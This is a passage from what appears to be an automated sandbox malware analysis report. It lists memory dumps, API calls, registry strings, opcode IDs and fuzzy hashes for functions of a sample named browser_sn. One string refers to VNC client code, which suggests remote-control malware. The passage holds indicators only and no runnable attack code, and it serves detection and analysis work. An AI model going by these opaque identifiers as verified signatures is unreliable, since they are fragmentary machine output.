                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateErrorFileLastMapping
                                                                            • String ID: {34F673E0-878F-11D5-B98A-00B0D07B8C7C}
                                                                            • API String ID: 1790465270-3305976270
                                                                            • Opcode ID: dbcc6fba753eff514446a0364bbb8b9bc7cf6d08a70ced7c788015d2b9f2cd1e
                                                                            • Instruction ID: d8cfdd29227a3e76465a981041543ea05b56b16ca2f965f9e2ee259a35a92943
                                                                            • Opcode Fuzzy Hash: dbcc6fba753eff514446a0364bbb8b9bc7cf6d08a70ced7c788015d2b9f2cd1e
                                                                            • Instruction Fuzzy Hash: 640184325086C282E7A08F25A44036AB7A0E745779F548335EBFE427E8DFBCC494D710
                                                                            Function 00007FF6C2BA89E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31synchronizationwindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: MessageObjectSendSingleWait
                                                                            • String ID: vncclient.cpp : client Kill() called
                                                                            • API String ID: 353115698-1198714380
                                                                            • Opcode ID: 0f203efc3d92cf8d5df219f435c3488083d109424bac7753846dae75abe6381d
                                                                            • Instruction ID: b30d9ac3ced1d7e2b38a830b3dcdf9631d1a03aafa2a6e641a291beedd57cd95
                                                                            • Opcode Fuzzy Hash: 0f203efc3d92cf8d5df219f435c3488083d109424bac7753846dae75abe6381d
                                                                            • Instruction Fuzzy Hash: 28017C32A04A8281EB98DF65E4457A93360FF85B6DF484231CBBD867D5CF78D495C380
                                                                            Function 00007FF6C2B86760 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            • SOFTWARE\Microsoft\Windows NT\CurrentVersion\Hotfix\Q246009, xrefs: 00007FF6C2B8678B
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseOpen
                                                                            • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Hotfix\Q246009
                                                                            • API String ID: 47109696-713323490
                                                                            • Opcode ID: 2ffe4356ded92a3a12c34227f40b863e036080daa4a6f7c6b14700cb5677b520
                                                                            • Instruction ID: 4a888b0be35dbd6f07552a6ffce3bd08100d2db88c1937925163a2e20b15b3c6
                                                                            • Opcode Fuzzy Hash: 2ffe4356ded92a3a12c34227f40b863e036080daa4a6f7c6b14700cb5677b520
                                                                            • Instruction Fuzzy Hash: 33F0AF36A1868281DB508F24E40436AA3B0EF55B9DF640036DF8C877A4EFAEC084C744
                                                                            Function 00007FF6C2BF1740 Relevance: 5.1, APIs: 4, Instructions: 60COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: free$ErrorFreeHeapLast_errnomalloc
                                                                            • String ID:
                                                                            • API String ID: 1225357528-0
                                                                            • Opcode ID: 565a491ae928519ec85caab6d3bd3699c487abe761962c68358d79beabe01652
                                                                            • Instruction ID: eb5ce44b7691f72a43b6a2639d21dd5eac0e5036d9c595cf958649739a667386
                                                                            • Opcode Fuzzy Hash: 565a491ae928519ec85caab6d3bd3699c487abe761962c68358d79beabe01652
                                                                            • Instruction Fuzzy Hash: 8811B459F2C58242FA80AB2AB1413BF5211AF85BCDF440530FF8D8BB8BDE6CD4824704
                                                                            Function 00007FF6C2C17320 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • TlsGetValue.KERNEL32(?,?,00000000,00007FF6C2C17423), ref: 00007FF6C2C17338
                                                                            • EnterCriticalSection.KERNEL32(?,?,00000000,00007FF6C2C17423), ref: 00007FF6C2C17352
                                                                            • InitializeCriticalSection.KERNEL32(?,?,00000000,00007FF6C2C17423), ref: 00007FF6C2C1739C
                                                                            • LeaveCriticalSection.KERNEL32(?,?,00000000,00007FF6C2C17423), ref: 00007FF6C2C173E3
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterInitializeLeaveValue
                                                                            • String ID:
                                                                            • API String ID: 3200804837-0
                                                                            • Opcode ID: 9b57fd7c55fe75021aeb7447fd861e4cda4a0a672ebbe4cb5d50cbd8ffadb556
                                                                            • Instruction ID: bc06e5b30e32149b679a34ad48206d3c3de744a8c810fe1f2e9bfdb0f878e616
                                                                            • Opcode Fuzzy Hash: 9b57fd7c55fe75021aeb7447fd861e4cda4a0a672ebbe4cb5d50cbd8ffadb556
                                                                            • Instruction Fuzzy Hash: 84210932A19B8291EA809F11E95026873B4FB58B89F444135DFCD83764DFBCE4A9C310